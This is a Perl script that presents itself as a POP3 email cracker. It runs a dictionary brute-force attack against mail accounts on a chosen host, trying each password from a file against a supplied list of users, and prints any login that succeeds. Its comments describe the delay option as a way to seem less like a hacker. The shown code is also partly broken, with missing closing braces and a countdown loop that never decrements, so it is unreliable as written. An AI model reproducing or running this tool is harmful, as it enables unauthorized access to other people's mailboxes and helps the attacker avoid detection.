# POPER - Pop3 Email Cracker
# by-free0n
# DoomRiderz - doomriderz.co.nr
# usage: perl poper.pl
# This is a pop3 brute force dictionary attacker that can
# read a list of users or specified user and run a password
# list attack against them. The brute forcer has a delay option
# which makes it not clog up the server with to many connections
# the option is defaulted to 10 seconds but can be changed for longer
# iterations.
use Net::POP3;

#default variable options
my $host = "localhost";
my $delay = "10";
my $account = "";
my $status = "1";

#arrays we use to store the usernames and passwords
#from the files
@users = ();
@passes = ();

#this is the name of the user and pass list
#by default it looks in the current directory as
#the script. So you will need to have a user list
#called users and a password list call pass
$user_list = 'users';
$pass_list = 'pass';

#variable is used to call clear which clears our screen
my $clear = '/usr/bin/clear';

#clear the terminal screen and write out the pretty banner :)
    open (CLEAR, "|$clear");
    close (CLEAR);
    print "-----------------------------------------------------------------\n";
    print "POPER POP3 Email Attacker\n";
    print "by-free0n\n";
    print "DoomRiderz - doomriderz.co.nr\n";
    print "Usage: perl poper.pl\n";
    print "------------------------------------------------------------------\n";

#input gathers all the user input we need to launch the
sub INPUT {
    print "Please enter the host:";
    $host = <STDIN>;
    chomp $host;
    print "Login Delay (10 seconds default):";
    $delay = <STDIN>;
    chomp $delay;
    print "Do you know a user account? [y/n]:";
    $account = <STDIN>;
    chomp $account;
    if($account eq "y") {
        print "Please enter the user account:";
        $account = <STDIN>;
        chomp $account;
        } else {
        $account = "";
    print "Would you like to display accounts being tried? [y/n]:";
    $status = <STDIN>;
    chomp $status;
    if($host eq "") {
        die("No host specified aborting!");
    if($delay eq "") {
        $delay = 10;
    print "Starting the Attack! please wait for status update...\n";

#call our subs this is more of the main
#start of the application..

#try and open the pass file
open (PASS, "$pass_list") or
die "Can't find the pass file abort!\n\n";

#we decide if we are going to load the userlist or
#an account specified in the options
if($account eq "") {
    open (USER, "$user_list") or
    die "Can't find the user file abort!\n\n";
    while($uline = <USER>) {
        ($user) = split(" ",$uline);
        push @users, "$user";
    } else {
    push @users, "$account";

#store passwords in list
while ($pline = <PASS>) {
    ($pass) = split(" ",$pline);
    push @passes, "$pass";

foreach $user (@users) {
    foreach $pass (@passes) {
        #this little countdown script is what causes the delay
        #the delay is useful so we don't overload the server at once
        #but can kind of test the account one per minute or one per hour
        #kind of making us less seem like a hacker i guess....
        if($delay > 0) {
            $countdown = $delay;
            while($countdown > 0) {
                sleep 1;
        #connect to the host
        $pop = Net::POP3->new($host, Timeout => 60)
        or die("couldn't connect to host:" . $host);
        #display status of accounts that are being tested
        if($status eq "1" or $status eq "y") {
            print "Trying " .$user . " password " . $pass . "\n";
        if($pop->login($user, $pass)) {
            #let the user know we found an account, \a sets of the terminal bell
            print "\a";
            print "--------------------------------------------------------------\n";
            print "Login found\n";
            print "--------------------------------------------------------------\n";
            print "username:" . $user . "\n";
            print "password:" . $pass . "\n";
            print "--------------------------------------------------------------\n";